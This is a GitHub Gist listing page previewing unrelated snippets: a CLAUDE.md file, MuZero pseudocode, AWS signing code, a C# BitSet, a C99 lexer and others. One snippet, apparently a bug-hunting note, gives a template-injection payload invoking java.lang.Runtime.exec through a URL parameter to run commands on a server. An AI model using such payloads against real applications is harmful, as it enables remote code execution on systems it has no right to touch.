Skip to content

Instantly share code, notes, and snippets.

@pirate
pirate / CLAUDE.md
Created June 18, 2025 23:44
Claude Code guidelines for browser-use monorepo parent directory containing all our sub-projects

CLAUDE.md

This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.

Repository Overview

This is a monorepo containing multiple projects in the Browser Use ecosystem - an AI browser automation framework. The main components are:

Core project folders:

@ipsec
ipsec / muzero_unplugged.py
Created July 17, 2022 02:42 — forked from Mononofu/muzero_unplugged.py
Pseudocode for MuZero Unplugged
"""Pseudocode description of the MuZero Unplugged algorithm."""
# pylint: disable=unused-argument
# pylint: disable=missing-docstring
# pylint: disable=g-explicit-length-test
import collections
import math
import random
import typing
from typing import Dict, List, Optional
@developingSiG
developingSiG / iQPrivacy_Policy.md
Created July 3, 2025 04:17
Privacy Policy for iQ™ by Serene Interactive, Global (SiG)

Last Updated: 07/02/2025

Welcome to iQ™, developed and operated by Serene Interactive, Global (SiG). This Privacy Policy explains how we handle your information when you use iQ™. By accessing or using iQ™, you agree to the terms of this Privacy Policy.

Privacy and Data Handling

  1. No Data Storage
    Serene Interactive, Global (SiG) does not store, log, or retain any data, conversations, or interaction content generated through iQ™.

  2. Real-Time Processing

@Yanrishatum
Yanrishatum / hxsl-cheatsheet.md
Last active July 3, 2025 04:18
HXSL cheat-sheet

HXSL cheat-sheet

This is a WIP of a cheat-sheet that I will finish Eventually™

Types

Mapping of the shader types to Heaps types:

Float = Float
Int = Int
Bool = Bool
@kn9ts
kn9ts / aws4_signing.py
Last active July 3, 2025 04:14
AWS V4 signing example in python
# AWS Version 4 signing example
#
# Example:
# Authorization: AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20150830/us-east-1/iam/aws4_request, SignedHeaders=content-type;host;x-amz-date, Signature=5d672d79c15b13162d9279b0855cfba6789a8edb4c82c400e06b5924a6f2b5d7
# Formulae:
# CanonicalRequest =
# HTTPRequestMethod + '\n' +
# CanonicalURI + '\n' +
# CanonicalQueryString + '\n' +
@NightOwl888
NightOwl888 / BitSet.cs
Last active July 3, 2025 04:51
C# port of the java.util.BitSet class
/* BitSet.cs -- A vector of bits.
Copyright (C) 1998, 1999, 2000, 2001, 2004, 2005 Free Software Foundation, Inc.
This file is part of GNU Classpath.
GNU Classpath is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
@codebrainz
codebrainz / c99.l
Created June 14, 2012 23:49
C99 Lex/Flex & YACC/Bison Grammars
D [0-9]
L [a-zA-Z_]
H [a-fA-F0-9]
E ([Ee][+-]?{D}+)
P ([Pp][+-]?{D}+)
FS (f|F|l|L)
IS ((u|U)|(u|U)?(l|L|ll|LL)|(l|L|ll|LL)(u|U))
%{
#include <stdio.h>
My input of abc${12*12}abc was reflected as abc144abc. Then I wanted to perform a simple id and get the result on screen. I proceeded with the following payload:
URI: /BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec('id')}
Payload: ${T(java.lang.Runtime).getRuntime().exec('id')}
After going through some Java classes I stumbled upon the following:
java.lang.Character.toString(105)
-> prints the characer 'i'
@matthiasak
matthiasak / languages-that-compile-to-js.md
Created October 15, 2015 13:12
Languages that compile to JS (from CoffeeScript wiki)

CoffeeScript Family (& Friends)

Family (share genes with CoffeeScript)
  • Coco A CoffeeScript dialect that aims to be more radical and practical, also acts as a test bed for features that get imported in CoffeeScript.
    • LiveScript is a fork of Coco that is much more compatible with CoffeeScript, more functional, and with more features.
  • IcedCoffeeScript A CoffeeScript dialect that adds support for await and defer keywords which simplify async control flow.
@codekansas
codekansas / binarized_nn_inference.cpp
Created November 1, 2017 02:25
Efficient binarized neural network inference
/* Binarized neural network inference example.
This shows a simple C++ program for doing inference on
binarized neural networks. To do this efficiently, the code
below makes use of the "bitset" class, which uses the "popcnt"
instruction to count the number of 1's that show up in the
matrix product, in constant time. This means that a matrix
multiplication between a (A, B) and (B, C) matrix takes
O(A * C) time; in other words, each value in the output matrix
is computed in constant time.
*/